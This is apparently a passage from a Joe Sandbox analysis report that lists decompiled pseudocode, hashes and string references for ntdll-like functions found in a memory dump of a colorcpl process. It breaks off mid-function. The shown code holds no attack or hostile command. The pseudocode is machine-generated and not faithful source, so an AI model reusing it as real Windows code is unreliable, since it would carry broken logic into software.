                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: WindowsExcludedProcs
                                                                                                • API String ID: 0-3583428290
                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                • Instruction ID: 3576c74e54bee7c911db5ae76dfde977ab3e8a03d2167e66a0f3ccef187f49ca
                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                • Instruction Fuzzy Hash: 8D21D37A900339AFDBA59A598840FDFB7AEAF80A54F165435BE148F200E631DE00C7E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E06E3F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                0x06e3f71d
                                                                                                0x06e3f722
                                                                                                0x06e3f726
                                                                                                0x06e84770
                                                                                                0x06e3f765
                                                                                                0x06e3f769
                                                                                                0x06e3f769
                                                                                                0x06e3f732
                                                                                                0x06e8477a
                                                                                                0x00000000
                                                                                                0x06e8477a
                                                                                                0x06e3f738
                                                                                                0x06e3f73a
                                                                                                0x06e3f73c
                                                                                                0x06e3f73f
                                                                                                0x06e3f746
                                                                                                0x06e3f778
                                                                                                0x06e3f7a9
                                                                                                0x06e3f7a9
                                                                                                0x06e3f754
                                                                                                0x06e3f75a
                                                                                                0x06e3f75d
                                                                                                0x06e3f75f
                                                                                                0x06e3f761
                                                                                                0x06e3f76f
                                                                                                0x06e3f771
                                                                                                0x06e3f771
                                                                                                0x06e3f76f
                                                                                                0x06e3f763
                                                                                                0x00000000
                                                                                                0x06e3f763
                                                                                                0x06e3f77d
                                                                                                0x06e3f7a3
                                                                                                0x06e3f7a5
                                                                                                0x00000000
                                                                                                0x06e3f7a5
                                                                                                0x06e3f77f
                                                                                                0x06e3f782
                                                                                                0x06e3f784
                                                                                                0x06e3f786
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3f788
                                                                                                0x06e3f748
                                                                                                0x06e3f74d
                                                                                                0x06e3f78d
                                                                                                0x06e3f793
                                                                                                0x06e3f7b7
                                                                                                0x06e3f7bc
                                                                                                0x00000000
                                                                                                0x06e3f7bc
                                                                                                0x06e3f798
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3f79d
                                                                                                0x06e3f7b0
                                                                                                0x00000000
                                                                                                0x06e3f7b0
                                                                                                0x06e3f79f
                                                                                                0x00000000
                                                                                                0x06e3f74f
                                                                                                0x06e3f74f
                                                                                                0x00000000
                                                                                                0x06e3f74f

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Actx
                                                                                                • API String ID: 0-89312691
                                                                                                • Opcode ID: 25ca142fa778abed9fb8e67c188c39d10ce9003d52a97e29f7d1bf789e6910da
                                                                                                • Instruction ID: 85d6caf73470e3892be883a914899cc79a7eec2f9ded70906876b170950fccf3
                                                                                                • Opcode Fuzzy Hash: 25ca142fa778abed9fb8e67c188c39d10ce9003d52a97e29f7d1bf789e6910da
                                                                                                • Instruction Fuzzy Hash: 3211D034F347228FFBA44E1DC498BB672A5EB85268F25653AE469CB3D0DA70C801C380
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EC8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 71%
                                                                                                			E06EC8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x6ef0d50);
				E06E6D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E06EA5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L06E6DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L06E6DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E06E6D130(_t34, _t39, _t40);
			}





                                                                                                0x06ec8df1
                                                                                                0x06ec8df1
                                                                                                0x06ec8df1
                                                                                                0x06ec8df1
                                                                                                0x06ec8df1
                                                                                                0x06ec8df1
                                                                                                0x06ec8df3
                                                                                                0x06ec8df8
                                                                                                0x06ec8dfd
                                                                                                0x06ec8e00
                                                                                                0x06ec8e0e
                                                                                                0x06ec8e2a
                                                                                                0x06ec8e36
                                                                                                0x06ec8e38
                                                                                                0x06ec8e3c
                                                                                                0x06ec8e46
                                                                                                0x06ec8e46
                                                                                                0x06ec8e36
                                                                                                0x06ec8e50
                                                                                                0x06ec8e56
                                                                                                0x06ec8e59
                                                                                                0x06ec8e5c
                                                                                                0x06ec8e60
                                                                                                0x06ec8e67
                                                                                                0x06ec8e6d
                                                                                                0x06ec8e73
                                                                                                0x06ec8e74
                                                                                                0x06ec8eb1
                                                                                                0x06ec8ebd

                                                                                                Strings
                                                                                                • Critical error detected %lx, xrefs: 06EC8E21
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Critical error detected %lx
                                                                                                • API String ID: 0-802127002
                                                                                                • Opcode ID: eeb81fa4312385ef9b98f6b3e408ce78d3c1039722cae625297bbd3e1c79c5cd
                                                                                                • Instruction ID: 3d0495a771e00d694471200734a713deca8684a7dff84d2e479c9ebcf36672d0
                                                                                                • Opcode Fuzzy Hash: eeb81fa4312385ef9b98f6b3e408ce78d3c1039722cae625297bbd3e1c79c5cd
                                                                                                • Instruction Fuzzy Hash: 84113571E54348DFDBA4CFA98E057EDBBB4AF04365F20625EE529AB282D3744602CF14
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EAFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 06EAFF60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                • API String ID: 0-1911121157
                                                                                                • Opcode ID: e69f9999d11a1682f52681776369b880f880b8e2adcc2d57dd0dc0b08c5c5e59
                                                                                                • Instruction ID: 41074030833eff99628093af499992d33c288b28dffe4ae9d510bd072fe4af3b
                                                                                                • Opcode Fuzzy Hash: e69f9999d11a1682f52681776369b880f880b8e2adcc2d57dd0dc0b08c5c5e59
                                                                                                • Instruction Fuzzy Hash: 16110075A60344EFDFA2EB50CD48F98B7B2FF08708F249048F1086B2A1C779AA44DB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE5BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 88%
                                                                                                			E06EE5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x6ef1178);
				E06E6D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E06EE4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E06E5D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E06EE5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x6f060e8;
								if( *0x6f060e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x6f060e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E06E59710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E06E56DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E06E5F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E06E5F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E06E5F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E06E5FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E06E5FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E06E5F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E06E5F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E06EE4CAB(_t306, _t528 - 0xa4);
